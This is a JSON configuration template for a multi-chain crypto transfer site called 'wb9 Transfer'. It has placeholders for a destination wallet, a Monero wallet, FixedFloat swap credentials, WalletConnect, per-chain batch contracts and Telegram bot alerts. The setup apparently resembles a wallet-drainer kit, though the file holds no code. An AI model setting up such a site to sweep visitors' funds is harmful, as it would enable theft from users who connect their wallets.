{
  "myWallet": "YOUR_DESTINATION_ADDRESS",
  "xmrWallet": "YOUR_XMR_WALLET_ADDRESS",
  "wcProjectId": "YOUR_WALLETCONNECT_PROJECT_ID",
  "ffApiKey": "YOUR_FIXEDFLOAT_API_KEY",
  "ffApiSecret": "YOUR_FIXEDFLOAT_API_SECRET",
  "ffToCcy": "ETH",
  "batchContract": {
    "1":     "",
    "137":   "",
    "56":    "",
    "42161": "",
    "10":    "",
    "8453":  "",
    "43114": ""
  },
  "siteName": "wb9 Transfer",
  "telegram": {
    "botToken": "YOUR_BOT_TOKEN",
    "chatId": "YOUR_CHAT_ID"
  },
  "networks": {
    "mainnet": "https://cloudflare-eth.com",
    "sepolia": "https://rpc.sepolia.org"
  }
}
